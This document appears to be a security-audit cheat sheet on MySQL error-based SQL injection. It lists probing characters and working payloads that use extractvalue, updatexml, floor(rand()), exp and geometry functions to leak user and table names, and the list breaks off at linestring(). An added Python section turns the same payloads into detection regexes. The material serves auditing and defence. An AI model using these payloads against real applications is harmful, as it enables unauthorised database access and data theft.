Contents
Audit approach
- If a parameter that is carried into a query in the code is not filtered in any way and causes an error, and that error message is echoed back, error-based queries can be used.
- Commonly used characters for error probing: ' \ ; %00 ) ( # "
- Error functions usually have a limit on the maximum length of the error output; in that case, split the output into pieces.
- The special parameters of certain functions only allow one field of one row to be returned; use an aggregation function such as group_concat to combine the data.
Error-based statements
id=4 and exp(~(select * from(select table_name from information_schema.tables where table_schema=database() limit 0,1)a));
1.floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8.linestring()
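As an added example (not part of the original page), the following Python snippet shows what a defender can do with the list above: turn the error-based function names and patterns into detection signatures and run them over request parameters as they would appear in an access log or WAF capture. The sample parameter values, the signature names (extractvalue, updatexml, floor_rand_groupby, exp_overflow, geometry) and the functions classify()/scan_params() are all assumptions constructed for this example; the only real inputs are the MySQL function names taken from the statements on the page.

```python
import re

# Constructed sample input: URL-decoded query-string values as they might be
# seen in an access log. These are made up for this example.
SAMPLE_PARAMS = [
    "4",
    "1 and extractvalue(1,concat(0x7e,(select user()),0x7e))",
    "1 and updatexml(1,concat(0x7e,(select user()),0x7e),1)",
    "1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x "
    "from information_schema.tables group by x)a)",
    "4 and exp(~(select * from(select table_name from information_schema.tables "
    "where table_schema=database() limit 0,1)a))",
    "1 and polygon((select * from(select * from(select user())a)b))",
    "hello world",
    "O'Brien",  # a legitimate apostrophe must not trigger an alert
]

# One signature per error-based technique listed on the page. Signature names
# are this example's own labels, not a standard taxonomy.
SIGNATURES = {
    # extractvalue(1, concat(0x7e, ...)) leaks data through an XPath syntax error
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    # updatexml(1, concat(0x7e, ...), 1) works the same way
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    # floor(rand(0)*2) combined with group by triggers a duplicate-key error
    "floor_rand_groupby": re.compile(r"\bfloor\s*\(\s*rand\s*\(.*\bgroup\s+by\b", re.I | re.S),
    # exp(~(subquery)) triggers a DOUBLE value out of range error
    "exp_overflow": re.compile(r"\bexp\s*\(\s*~", re.I),
    # geometry constructors fed a subquery raise an illegal-argument error
    "geometry": re.compile(
        r"\b(geometrycollection|multipoint|polygon|multipolygon|linestring)"
        r"\s*\(\s*\(?\s*select\b",
        re.I,
    ),
}


def classify(value: str) -> list:
    """Return the names of all error-based signatures matching one parameter value."""
    return [name for name, pattern in SIGNATURES.items() if pattern.search(value)]


def scan_params(values) -> dict:
    """Map each offending parameter value to the signatures it matched.
    Values with no match are left out so the result is a pure alert list."""
    alerts = {}
    for value in values:
        hits = classify(value)
        if hits:
            alerts[value] = hits
    return alerts


if __name__ == "__main__":
    for value, hits in scan_params(SAMPLE_PARAMS).items():
        print(f"{hits}: {value[:60]}")
```

The regexes anchor on the function call shape (name followed by an opening parenthesis, and for the geometry family a subquery directly inside) rather than on single characters, so ordinary values containing quotes or parentheses do not raise alerts. This is a coarse log-side signal; the root cause named in the audit approach above, unfiltered parameters concatenated into a query, is removed by parameterized queries, not by pattern matching.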